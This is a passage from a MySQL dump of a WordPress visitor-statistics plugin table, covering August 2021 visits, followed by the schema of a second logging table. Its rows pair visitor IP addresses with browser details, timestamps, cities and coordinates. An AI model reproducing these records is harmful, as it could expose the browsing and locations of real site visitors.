04:17:14',0,0,1,77,77,1,0,'en-US',2,'Desktop',3,'21:16:23',0,0,40,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(93,1,'27fde2a348f8d20a','2021-08-15 04:31:15','5389e290dc74c3b3','209.122.205.15','0','2021-08-15 04:31:15',0,0,1,77,77,1,4,'en-us',4,'Mobile',11,'04:31:14',0,0,25,1,0,0,0,0,0,0,0,0,0,'New York',236,40.754700,-73.992500,0),(94,1,'6086ca20a0b9edd6','2021-08-15 05:09:51','b4c63e4931a0543d','49.193.104.45','0','2021-08-15 05:07:25',0,0,1,61,85,2,4,'en-US',2,'Desktop',12,'15:07:24',0,200,21,1,0,0,0,0,1,0,0,0,0,'',14,-33.494000,143.210400,0),(95,1,'7d6ee8e8d4b78679','2021-08-15 05:16:59','4331742a2a0f801f','41.191.107.39','0','2021-08-15 05:15:36',0,0,1,86,87,2,4,'en-us',4,'Mobile',11,'05:15:35',0,84,25,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(96,1,'de4ca55714767982','2021-08-15 05:47:02','ded9f78b24550499','40.77.188.132','0','2021-08-15 05:47:02',0,0,1,88,88,1,0,'en-US',13,'Desktop',12,'22:47:01',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(97,1,'56ca87dbec5f23a3','2021-08-15 07:19:59','ded9f78b24550499','40.77.190.98','0','2021-08-15 07:19:59',0,0,1,1,1,1,0,'en',13,'Desktop',12,'07:19:56',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(98,1,'77b3fb9392271f37','2021-08-15 07:39:56','ded9f78b24550499','40.77.202.6','0','2021-08-15 07:39:56',0,0,1,89,89,1,0,'en-US',13,'Desktop',12,'07:39:54',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(99,1,'3e514f571887142c','2021-08-15 08:14:54','4331742a2a0f801f','102.176.94.166','0','2021-08-15 08:14:02',0,0,1,27,90,1,4,'en-us',4,'Mobile',11,'08:14:01',0,95,43,1,0,0,0,0,0,0,0,0,0,'',84,8.000000,-2.000000,0),(100,1,'5235c3903840a0ad','2021-08-15 08:46:46','ded9f78b24550499','40.77.139.78','0','2021-08-15 08:46:46',0,0,1,76,76,1,0,'en-US',13,'Desktop',12,'01:46:39',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(101,1,'b544bf0e99817d4e','2021-08-15 09:12:51','4ce6f62e4705134c','86.185.4.122','0','2021-08-15 09:12:51',0,0,1,8,21,6,0,'en-GB',2,'Desktop',8,'10:12:50',0,8994,19,1,0,0,0,0,1,0,0,0,0,'Chigwell',235,51.616700,0.083300,0),(102,1,'edd10b54c8d896c8','2021-08-15 10:05:59','ded9f78b24550499','40.77.139.115','0','2021-08-15 10:05:59',0,0,1,91,91,1,0,'en-US',13,'Desktop',12,'03:05:57',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(103,1,'17429cc38c623408','2021-08-15 10:13:04','ded9f78b24550499','40.77.188.135','0','2021-08-15 10:13:04',0,0,1,92,92,1,0,'en',13,'Desktop',12,'03:13:02',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(104,1,'648449973ac5b8b4','2021-08-15 10:13:27','ded9f78b24550499','40.77.190.202','0','2021-08-15 10:13:27',0,0,1,93,93,1,0,'en',13,'Desktop',12,'03:13:23',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(105,1,'6c9f9974aea0e57f','2021-08-15 10:23:56','9fb9b1676489e356','41.57.95.40','0','2021-08-15 10:23:56',0,0,1,15,15,1,4,'en-US',2,'Mobile',10,'10:23:49',0,11,44,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(106,1,'775a2e1675a88ec6','2021-08-15 10:31:15','ded9f78b24550499','40.77.190.33','0','2021-08-15 10:31:15',0,0,1,94,94,1,0,'en',13,'Desktop',12,'03:31:13',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(107,1,'1e2c7ce3869af143','2021-08-15 11:25:32','1bcbede772ff6e14','154.124.84.56','0','2021-08-15 11:25:32',0,0,1,9,9,1,4,'en-US',1,'Desktop',12,'11:25:32',0,196,20,1,0,0,0,0,0,0,0,0,0,'Dakar',196,14.670800,-17.438100,0),(108,1,'b7583e6cfe0b4373','2021-08-15 12:00:16','4ce6f62e4705134c','197.215.218.250','0','2021-08-15 12:00:16',0,0,1,5,5,1,0,'en-US',2,'Desktop',8,'12:00:13',0,15,20,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(109,1,'2a508f3d6be1b31c','2021-08-15 12:58:41','c8662db60ec8ad1d','41.57.95.17','0','2021-08-15 12:58:41',0,0,1,79,79,1,0,'en',2,'Mobile',10,'05:58:38',0,3,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(110,1,'01154596668d632c','2021-08-15 13:30:53','a830ef9e6e86b540','41.212.85.196','0','2021-08-15 13:18:07',0,0,1,93,93,3,4,'en-US',2,'Mobile',10,'16:18:04',0,798,39,1,0,0,0,0,0,0,0,0,0,'Nairobi',116,-1.283300,36.816700,0),(111,1,'469c35dceb756455','2021-08-15 17:02:15','4ce6f62e4705134c','103.142.80.132','0','2021-08-15 17:02:15',0,0,1,95,95,1,4,'en-US',2,'Desktop',8,'23:02:11',0,1515,33,1,0,0,0,0,1,0,0,0,0,'Not found',0,0.000000,0.000000,0),(112,1,'84a3a08969d2eb8a','2021-08-15 17:42:04','5319cd1fa59d2f89','41.57.95.203','0','2021-08-15 17:41:08',0,0,1,3,3,1,4,'en-US',1,'Desktop',7,'10:41:28',0,166,20,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(113,1,'4eb77274864058b3','2021-08-15 17:56:57','4e9255cedec79344','175.44.42.117','0','2021-08-15 17:56:57',0,0,1,5,5,1,96,'en-US',4,'Mobile',11,'13:56:56',0,0,43,1,0,0,0,0,0,0,0,0,0,'Putian',46,24.987800,118.498300,0),(114,1,'78f2eaf2450f5e17','2021-08-15 19:31:29','c8662db60ec8ad1d','41.191.107.145','0','2021-08-15 19:31:29',0,0,1,1,1,1,0,'en-US',2,'Mobile',10,'12:31:23',0,0,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(115,1,'14ec824eb56c0a61','2021-08-15 19:34:13','23971f8429f12b1a','41.191.107.145','0','2021-08-15 19:31:34',0,0,1,1,97,2,0,'en-US',2,'Mobile',10,'19:31:31',0,480,45,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(116,1,'eed025b413230de2','2021-08-15 19:52:16','5f24e765daff4328','41.191.107.49','0','2021-08-15 19:50:12',0,0,1,15,30,4,10,'en-US',1,'Desktop',8,'19:50:09',0,246,33,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(117,1,'35ade4f4cf9ae720','2021-08-15 20:39:24','4ce6f62e4705134c','37.164.47.205','0','2021-08-15 20:39:24',0,0,1,1,1,1,4,'es-US',2,'Desktop',8,'22:39:23',0,274,22,1,0,0,0,0,1,0,0,0,0,'',76,48.858200,2.338700,0),(118,1,'54aeeaa305c2d07b','2021-08-15 21:04:54','348a0f9fb1616a61','116.179.37.194','0','2021-08-15 21:04:54',0,0,1,5,5,1,0,'zh-CN',14,'Desktop',15,'05:04:52',0,0,46,1,0,0,0,0,0,0,0,0,0,'',46,34.772500,113.726600,0),(119,1,'3f5d47dc78b232ef','2021-08-15 21:04:54','3bead6cd0e71982b','116.179.37.174','0','2021-08-15 21:04:54',0,0,1,5,5,1,0,'zh-CN',4,'Mobile',11,'05:04:52',0,0,43,1,0,0,0,0,0,0,0,0,0,'',46,34.772500,113.726600,0),(120,1,'80d4cd36e25c22f8','2021-08-15 21:10:14','c8662db60ec8ad1d','41.57.95.117','0','2021-08-15 21:10:14',0,0,1,1,1,1,0,'en-US',2,'Mobile',10,'14:10:10',0,0,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(121,1,'f610306237ef4590','2021-08-15 21:12:34','a7d8596e63903721','41.57.95.117','0','2021-08-15 21:10:19',0,0,1,1,2,2,0,'en-US',2,'Mobile',10,'21:10:17',0,136,39,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(122,1,'69d2e21d0ab67c12','2021-08-15 21:18:32','ded9f78b24550499','40.77.202.157','0','2021-08-15 21:18:32',0,0,1,100,100,1,0,'en-US',13,'Desktop',12,'14:18:30',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(123,1,'c82e8c56bf651386','2021-08-15 21:55:23','ded9f78b24550499','40.77.202.136','0','2021-08-15 21:55:23',0,0,1,30,30,1,0,'en-US',13,'Desktop',12,'14:55:21',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(124,1,'c80ffda043965b73','2021-08-16 02:46:00','ded9f78b24550499','40.77.139.104','0','2021-08-16 02:46:00',0,0,1,5,5,1,0,'en',13,'Desktop',12,'19:45:57',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(125,1,'c2cdd34939852ba3','2021-08-16 02:50:24','42a250935a45a446','82.102.25.252','0','2021-08-16 02:50:24',0,0,1,5,5,1,0,'en-US',2,'Desktop',14,'10:50:22',0,0,47,1,0,0,0,0,0,0,0,0,0,'Singapore',200,1.293100,103.855800,0),(126,1,'14dd046cfeccbf47','2021-08-16 03:08:45','ded9f78b24550499','40.77.191.179','0','2021-08-16 03:08:45',0,0,1,30,30,1,0,'en',13,'Desktop',12,'20:08:42',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(127,1,'36ee5e7e42414e29','2021-08-16 03:53:01','ded9f78b24550499','40.77.189.161','0','2021-08-16 03:53:01',0,0,1,101,101,1,0,'en-US',13,'Desktop',12,'20:52:59',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(128,1,'fcce63e38eafc055','2021-08-16 04:16:38','ded9f78b24550499','40.77.188.104','0','2021-08-16 04:16:38',0,0,1,15,15,1,0,'en-US',13,'Desktop',12,'21:16:37',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(129,1,'b1640d7482ec9c31','2021-08-16 06:09:59','116d288fc35f6688','66.220.149.116','0','2021-08-16 06:09:59',0,0,1,25,25,1,102,'en-US',15,'Desktop',15,'23:09:55',0,16,48,1,0,0,0,0,1,0,0,0,0,'',236,37.751000,-97.822000,0),(130,1,'4ed041f0899d1ce1','2021-08-16 06:41:14','c8662db60ec8ad1d','41.191.107.210','0','2021-08-16 06:41:14',0,0,1,1,1,1,0,'en-US',2,'Mobile',10,'23:41:09',0,0,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(131,1,'14ec824eb56c0a61','2021-08-16 08:18:30','23971f8429f12b1a','41.191.107.210','0','2021-08-16 06:41:14',0,0,1,1,1,3,0,'en-US',2,'Mobile',10,'06:41:12',0,5837,45,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(132,1,'6af09742ed1e9717','2021-08-16 06:44:31','4ce6f62e4705134c','41.191.104.42','0','2021-08-16 06:43:53',0,0,1,103,104,1,4,'en-US',2,'Desktop',8,'06:43:51',0,91,20,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(133,1,'eb4bfaa3ce1fb5cf','2021-08-16 06:48:12','173de9ccf6d68ae8','113.211.208.74','0','2021-08-16 06:48:12',0,0,1,34,34,1,4,'en-US',2,'Desktop',14,'14:48:10',0,0,13,1,0,0,0,0,1,0,0,0,0,'',135,2.500000,112.500000,0),(134,1,'d2f6bbcc92e39cde','2021-08-16 16:34:07','39299172ab1dd88b','83.225.39.55','0','2021-08-16 07:31:34',0,0,1,25,25,2,0,'it-IT',2,'Desktop',14,'09:31:32',0,32554,22,1,0,0,0,0,1,0,0,0,0,'',110,43.147900,12.109700,0),(135,1,'e5444ec91216862b','2021-08-16 07:44:15','5309a31f3e4201a7','92.5.39.92','0','2021-08-16 07:38:15',0,0,1,32,79,6,4,'ko-KR',2,'Desktop',14,'08:38:13',0,46561,12,1,0,0,0,0,1,0,0,0,0,'Inverness',235,57.476800,-4.247200,0),(136,1,'1eee6a1beaa9d6cd','2021-08-16 23:50:24','5f24e765daff4328','41.191.104.120','38','2021-08-16 08:03:49',0,0,1,9,23,4,0,'en-US',1,'Desktop',8,'01:03:36',0,57368,33,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(137,1,'09150aced5a442ce','2021-08-16 08:18:29','c8662db60ec8ad1d','41.191.107.210','0','2021-08-16 08:18:29',0,0,1,1,1,1,0,'en-US',2,'Mobile',10,'01:18:26',0,0,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(138,1,'61e8b34301bec640','2021-08-16 10:52:01','4ce6f62e4705134c','196.250.176.86','0','2021-08-16 10:51:28',0,0,1,105,106,1,4,'en-US',2,'Desktop',8,'10:51:27',0,174,19,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(139,1,'854fac3f7fd0bad7','2021-08-16 11:43:14','95cf25551f77ff14','41.191.107.202','0','2021-08-16 11:42:26',0,0,1,34,34,1,4,'en-us',4,'Mobile',11,'11:42:24',0,109,49,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(140,1,'b6bdd91df3c41c68','2021-08-16 11:43:47','4ce6f62e4705134c','41.191.104.41','38','2021-08-16 11:43:47',0,0,1,9,8,5,0,'en-US',2,'Desktop',8,'11:43:45',0,31,19,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(141,1,'0cc037f330e8e05d','2021-08-16 12:28:03','5389e290dc74c3b3','41.57.95.229','0','2021-08-16 12:27:40',0,0,1,1,62,1,4,'en-us',4,'Mobile',11,'12:27:39',0,24,50,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(142,1,'50dcd8f3c0669e57','2021-08-16 12:45:55','ded9f78b24550499','40.77.202.121','0','2021-08-16 12:45:55',0,0,1,30,30,1,0,'en-US',13,'Desktop',12,'05:45:54',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(143,1,'05e784600ab30bcb','2021-08-16 12:46:47','5572bdfee08ee78b','41.191.104.93','0','2021-08-16 12:45:57',0,0,1,61,107,1,4,'en-US',2,'Mobile',10,'12:45:55',0,102,51,1,0,0,0,0,0,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(144,1,'f3b6f729d49c8bd1','2021-08-16 16:00:49','0dc5b8988e8ee121','41.191.105.90','0','2021-08-16 12:47:48',0,0,1,5,5,2,0,'en-US',2,'Desktop',14,'05:47:46',0,16809,12,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(145,1,'72ccc58cc531a4a7','2021-08-16 12:53:43','ded9f78b24550499','40.77.188.220','0','2021-08-16 12:53:43',0,0,1,109,109,1,0,'en-US',13,'Desktop',12,'05:53:40',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(146,1,'cb75fdebb2f7bec9','2021-08-16 13:56:15','23971f8429f12b1a','41.57.95.29','0','2021-08-16 13:56:15',0,0,1,25,25,1,42,'en-US',2,'Mobile',10,'13:56:12',0,0,45,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(147,1,'a89daab5b9145759','2021-08-16 14:13:09','78ab425d4ce1d94c','41.191.104.41','0','2021-08-16 14:12:58',0,0,1,34,23,1,4,'fr-fr',4,'Mobile',11,'14:12:56',0,12,43,1,0,0,0,0,0,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(148,1,'5d03e6e2c07bc2b6','2021-08-16 14:35:42','4ce6f62e4705134c','41.191.104.95','0','2021-08-16 14:35:37',0,0,1,110,111,1,10,'en-US',2,'Desktop',8,'14:35:36',0,1059,19,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(149,1,'10eb57d621a2c8e3','2021-08-16 14:43:27','f2e73653048cdf7c','41.191.107.201','0','2021-08-16 14:43:27',0,0,1,32,32,1,4,'en-US',2,'Mobile',10,'14:43:25',0,0,30,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(150,1,'5d1dc3380a63e831','2021-08-16 16:00:25','c16ac810d591e435','41.57.95.127','0','2021-08-16 16:00:25',0,0,1,79,79,1,4,'en-US',2,'Mobile',10,'16:00:23',0,31,39,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(151,1,'9cde76db05af50e3','2021-08-16 16:58:57','ded9f78b24550499','40.77.189.70','0','2021-08-16 16:58:57',0,0,1,112,112,1,0,'en',13,'Desktop',12,'09:58:56',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(152,1,'3df34b275f8ab168','2021-08-16 17:24:47','1673228da03446ba','41.57.95.139','0','2021-08-16 17:22:41',0,0,1,1,14,2,4,'en-LR',2,'Mobile',10,'17:22:37',0,127,35,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(153,1,'07f77ec486a9aa85','2021-08-16 18:29:24','116d288fc35f6688','173.252.127.23','0','2021-08-16 18:29:24',0,0,1,25,25,1,102,'en-US',15,'Desktop',15,'11:29:22',0,19,48,1,0,0,0,0,1,0,0,0,0,'',236,37.751000,-97.822000,0),(154,1,'244126bbfce6bc1f','2021-08-16 19:11:05','ded9f78b24550499','40.77.188.113','0','2021-08-16 19:11:05',0,0,1,113,113,1,0,'en',13,'Desktop',12,'12:11:01',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(155,1,'627191c64d3e64a1','2021-08-16 20:43:34','ded9f78b24550499','40.77.189.126','0','2021-08-16 20:43:34',0,0,1,114,114,1,0,'en-US',13,'Desktop',12,'13:43:33',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(156,1,'4a91555aa9076c12','2021-08-16 21:19:18','aa1e5fce959d6de7','41.57.95.124','0','2021-08-16 21:19:18',0,0,1,15,15,1,4,'en-GB',2,'Mobile',10,'21:18:38',0,76,37,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(157,1,'e77ccabe4333b8bf','2021-08-16 21:52:53','ded9f78b24550499','40.77.189.98','0','2021-08-16 21:52:53',0,0,1,115,115,1,0,'en-US',13,'Desktop',12,'14:52:52',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(158,1,'4d355f2e698d9276','2021-08-16 23:29:58','ded9f78b24550499','40.77.190.163','0','2021-08-16 23:29:58',0,0,1,110,110,1,0,'en',13,'Desktop',12,'16:29:54',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(159,1,'1eee6a1beaa9d6cd','2021-08-17 03:37:41','5f24e765daff4328','41.191.104.67','38','2021-08-17 00:27:54',0,0,1,9,122,19,0,'en-US',1,'Desktop',8,'17:27:42',0,11536,33,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(160,1,'632a70ef6500ab8f','2021-08-17 00:29:04','23971f8429f12b1a','41.191.107.58','0','2021-08-17 00:29:04',0,0,1,34,34,1,4,'en-US',2,'Mobile',10,'00:29:03',0,65,39,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(161,1,'a5ea93a3a6e4c18c','2021-08-17 00:30:04','ded9f78b24550499','40.77.188.163','0','2021-08-17 00:30:04',0,0,1,116,116,1,0,'en',13,'Desktop',12,'17:30:03',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(162,1,'57e82122fb25aca9','2021-08-17 00:39:27','ded9f78b24550499','40.77.188.216','0','2021-08-17 00:39:27',0,0,1,30,30,1,0,'en-US',13,'Desktop',12,'17:39:25',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(163,1,'5812efa7882fe98f','2021-08-17 01:33:13','ded9f78b24550499','40.77.190.27','0','2021-08-17 01:33:13',0,0,1,38,38,1,0,'en-US',13,'Desktop',12,'18:33:12',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(164,1,'8e7a43734640ad47','2021-08-17 02:41:21','ded9f78b24550499','40.77.139.10','0','2021-08-17 02:41:21',0,0,1,119,119,1,0,'en-US',13,'Desktop',12,'19:41:19',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(165,1,'ac95b4cd9e9d394f','2021-08-17 03:46:34','4ce6f62e4705134c','96.2.140.162','0','2021-08-17 03:46:34',0,0,1,8,34,7,0,'en-US',2,'Desktop',8,'22:46:32',0,9442,33,1,0,0,0,0,1,0,0,0,0,'West Fargo',236,46.890700,-96.925800,0),(166,1,'e5444ec91216862b','2021-08-17 05:20:22','5309a31f3e4201a7','92.5.39.92','0','2021-08-17 05:20:22',0,0,1,32,79,6,0,'ko-KR',2,'Desktop',14,'06:20:20',0,25651,12,1,0,0,0,0,1,0,0,0,0,'Inverness',235,57.476800,-4.247200,0),(167,1,'f94d83ff4d7f02cc','2021-08-17 06:20:36','c8662db60ec8ad1d','105.160.103.124','0','2021-08-17 06:20:36',0,0,1,116,116,1,0,'en',2,'Mobile',10,'23:20:31',0,4,26,1,0,0,0,0,0,0,0,0,0,'',116,1.000000,38.000000,0),(168,1,'fc3f6e6e31ec3791','2021-08-17 06:36:02','4ce6f62e4705134c','95.116.119.67','0','2021-08-17 06:36:02',0,0,1,27,27,1,10,'de',2,'Desktop',8,'08:36:01',0,0,22,1,0,0,0,0,1,0,0,0,0,'Reinbek',83,53.517000,10.248800,0),(169,1,'21b48e16d271f8a4','2021-08-17 07:17:19','ded9f78b24550499','40.77.188.52','0','2021-08-17 07:17:19',0,0,1,123,123,1,0,'en-US',13,'Desktop',12,'07:17:18',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(170,1,'b7583e6cfe0b4373','2021-08-17 09:23:43','4ce6f62e4705134c','197.215.218.250','0','2021-08-17 09:23:43',0,0,1,5,5,1,0,'en-US',2,'Desktop',8,'09:23:40',0,15,20,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(171,1,'b0e1d6bc3f45101a','2021-08-17 09:44:41','608ad909becb70ff','41.191.104.46','0','2021-08-17 09:44:41',0,0,1,116,116,1,4,'en-GB',2,'Mobile',10,'09:44:38',0,92,30,1,0,0,0,0,0,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(172,1,'d6ac56b8ecfb1da5','2021-08-17 10:13:51','4ce6f62e4705134c','194.16.178.140','0','2021-08-17 10:13:46',0,0,1,1,59,1,4,'sv-SE',2,'Desktop',8,'12:13:44',0,62,19,1,0,0,0,0,1,0,0,0,0,'Gävle',215,60.674500,17.141700,0),(173,1,'0afb2863621b72c0','2021-08-17 11:00:29','fa7c2a53c6d8fe2e','41.191.107.195','0','2021-08-17 11:00:29',0,0,1,61,61,1,4,'en-us',4,'Mobile',11,'11:00:28',0,62,49,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(174,1,'f3b6f729d49c8bd1','2021-08-17 14:48:02','0dc5b8988e8ee121','41.191.107.141','0','2021-08-17 11:03:03',0,0,1,5,5,4,0,'en-US',2,'Desktop',14,'04:03:02',0,22204,12,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(175,1,'d066f21d35e0486b','2021-08-17 12:35:58','4ce6f62e4705134c','164.160.9.86','0','2021-08-17 12:35:58',0,0,1,1,1,1,4,'en-US',2,'Desktop',8,'12:35:55',0,104,20,1,0,0,0,0,1,0,0,0,0,'Buchanan',126,5.880800,-10.046700,0),(176,1,'742d254ce7c8b504','2021-08-17 13:24:39','4ce6f62e4705134c','41.57.83.242','0','2021-08-17 12:57:44',0,0,1,35,35,3,4,'en-US',2,'Desktop',8,'12:57:43',0,1631,22,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(177,1,'10eb57d621a2c8e3','2021-08-17 13:07:51','f2e73653048cdf7c','41.191.104.95','0','2021-08-17 13:07:23',0,0,1,32,124,1,4,'en-US',2,'Mobile',10,'13:07:21',0,29,30,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(178,1,'124902230f812c48','2021-08-17 13:14:39','4ce6f62e4705134c','164.160.11.46','0','2021-08-17 13:07:51',0,0,1,72,107,2,4,'en-US',2,'Desktop',8,'13:07:49',0,508,19,1,0,0,0,0,1,0,0,0,0,'Tubmanburg',126,6.870800,-10.817200,0),(179,1,'89accf6332f57339','2021-08-17 15:11:40','ded9f78b24550499','40.77.139.58','0','2021-08-17 15:11:40',0,0,1,16,16,1,0,'en',13,'Desktop',12,'08:11:38',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(180,1,'4a0252386f76df8c','2021-08-17 15:15:34','ded9f78b24550499','40.77.189.253','0','2021-08-17 15:15:34',0,0,1,27,27,1,0,'en',13,'Desktop',12,'08:15:31',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(181,1,'0827e8d1f0ada1db','2021-08-17 15:23:14','97363c23b27785a4','169.252.4.22','0','2021-08-17 15:23:14',0,0,1,1,1,1,0,'en-US',2,'Desktop',8,'15:23:12',0,860,14,1,0,0,0,0,0,0,0,0,0,'Washington',236,38.893300,-77.014600,0),(182,1,'b6bdd91df3c41c68','2021-08-17 15:26:48','4ce6f62e4705134c','41.57.95.234','38','2021-08-17 15:26:33',0,0,1,9,16,8,0,'en-US',2,'Desktop',8,'15:26:31',0,4994,19,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(183,1,'9e44b595b31a303c','2021-08-17 15:57:10','8f3208bc150b4a67','197.210.55.198','0','2021-08-17 15:57:10',0,0,1,27,27,1,4,'en-GB',2,'Mobile',10,'16:57:06',0,60,52,1,0,0,0,0,0,0,0,0,0,'Lagos',162,6.453100,3.395800,0),(184,1,'9849b527b11cdaf5','2021-08-17 16:02:18','4331742a2a0f801f','41.191.104.230','0','2021-08-17 16:02:18',0,0,1,5,5,1,4,'en-us',4,'Mobile',11,'16:02:16',0,16,50,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(185,1,'145122fd602417c7','2021-08-17 16:17:04','173de9ccf6d68ae8','143.231.249.153','0','2021-08-17 16:17:04',0,0,1,93,93,1,4,'en-US',2,'Desktop',14,'12:17:03',0,0,13,1,0,0,0,0,1,0,0,0,0,'Washington',236,38.920200,-77.037500,0),(186,1,'4966b9f59f1dfcb8','2021-08-17 16:43:52','5572bdfee08ee78b','41.57.95.220','0','2021-08-17 16:43:52',0,0,1,70,70,1,4,'en-US',2,'Mobile',10,'16:43:24',0,46,51,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(187,1,'f1c36d2e6cffad3d','2021-08-17 17:08:19','ded9f78b24550499','40.77.189.203','0','2021-08-17 17:08:19',0,0,1,125,125,1,0,'en',13,'Desktop',12,'10:08:18',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0);
/*!40000 ALTER TABLE `wp_wsm_logUniqueVisit` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_logVisit`
--

DROP TABLE IF EXISTS `wp_wsm_logVisit`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_logVisit` (
  `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT,
  `siteId` int(10) unsigned NOT NULL,
  `visitorId` varchar(20) NOT NULL,
  `visitId` bigint(10) unsigned NOT NULL,
  `refererUrlId` int(10) unsigned DEFAULT '0',
  `keyword` varchar(200) DEFAULT NULL,
  `serverTime` datetime NOT NULL,
  `timeSpentRef` int(11) unsigned NOT NULL,
  `URLId` int(10) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `index_visitId` (`visitId`),
  KEY `index_siteId_serverTime` (`siteId`,`serverTime`)
) ENGINE=InnoDB AUTO_INCREMENT=307 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_logVisit`
--

LOCK TABLES `wp_wsm_logVisit` WRITE;
/*!40000 ALTER TABLE `wp_wsm_logVisit` DISABLE KEYS */;
